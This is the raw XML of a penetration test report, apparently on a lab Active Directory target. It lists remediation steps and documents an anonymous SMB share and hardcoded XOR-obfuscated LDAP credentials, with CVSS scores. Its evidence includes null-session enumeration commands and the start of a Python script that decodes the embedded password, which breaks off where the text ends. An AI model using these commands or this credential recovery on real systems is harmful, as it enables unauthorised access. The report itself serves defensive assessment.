    <w:p w14:paraId="081D86EA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Finding 4] – Remove the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACE held by SHARED SUPPORT ACCOUNTS over the Domain Controller computer object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86EB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce a password change for all affected users due to confirmed domain compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86EC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc233206072"/>
      <w:r>
        <w:t>Medium Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="081D86ED" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>[Finding 1] – Disable anonymous/null session access to SMB shares; restrict share permissions to least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86EE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Finding 2] – Migrate service account secrets to a managed secrets store (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gMSA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Key Vault, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Vault)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86EF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Finding 4] – Reduce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-DS-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MachineAccountQuota</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to 0 for standard domain users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>[Finding 4] – Audit all groups/accounts with write access to sensitive AD objects (computer accounts, especially Domain Controllers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc233206073"/>
      <w:r>
        <w:t>Long Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="081D86F2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Perform periodic Active Directory security assessments and ACL audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement advanced auditing on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attribute changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Educate developers/administrators on secure secrets management practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enhance network segmentation and monitoring to detect anomalous LDAP/Kerberos activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86F7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc233206074"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="081D86F8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc233206075"/>
      <w:r>
        <w:t>1. Anonymous SMB Share Exposing Sensitive Utility Binary — Medium</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5C3F" w14:paraId="081D86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6F9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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FA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-284 (Improper Access Control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86F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E79F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D86FC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score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6FD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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6FF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector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00" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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02" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description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03" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The support-tools SMB share permits anonymous (null session) read access. While most contents are legitimate IT utilities, the share also exposes UserInfo.exe.zip, an internal-use binary that should require authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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05" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Impact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06" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous access allows unauthenticated attackers to retrieve internal tooling that may contain embedded secrets or sensitive logic, as demonstrated in Finding 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D870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08" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Host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09" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223 (445/TCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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0B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation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0C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Disable anonymous/null session SMB access. Apply least-privilege share permissions restricted to authenticated, authorized accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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0E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External References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0F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1135/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8711" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8712"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nxc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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.129.11.223 -u '' -p '' --shares</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> //10.129.11.223/support-tools -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225014B1" w14:textId="4A1EC373" w:rsidR="00295BD1" w:rsidRDefault="00295BD1">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193D001A" wp14:editId="2C5FC9A1">
            <wp:extent cx="5731510" cy="2174875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="317014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14047" name="Picture 317014047"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2174875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8713" w14:textId="02AF397A" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006B73BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Anonymous SMB Share Listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8714" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc233206076"/>
      <w:r>
        <w:t>2. Hardcoded / Weakly-Obfuscated Credentials in Distributed Binary — High</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5C3F" w14:paraId="081D87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15" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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16" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-798 (Use of Hard-coded Credentials)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D871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CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8718" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score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19" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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1B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector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1C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D872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1E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description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1F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The UserInfo.exe binary contains a Protected class implementing a trivial XOR-based obfuscation (Base64 decode → XOR “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>armando</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">” → XOR 0xDF) protecting an LDAP service account password, passed directly into a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DirectoryEntry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LDAP bind.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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21" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Security Impact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22" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Static, reversible obfuscation is not encryption. Any party retrieving the binary can recover valid LDAP credentials offline, with no rate-limiting or detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D872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24" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Host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25" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D872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27" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation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28" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Never embed credentials in distributed binaries. Use a managed secrets store (Azure Key Vault, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HashiCorp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vault, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gMSA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>). Rotate the exposed credential immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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2A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External References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2B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1552/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D872D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D872F" w14:textId="70E1BFBF" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="006B73BF">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import base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">key = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b"armando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data = base64.b64decode(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enc_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
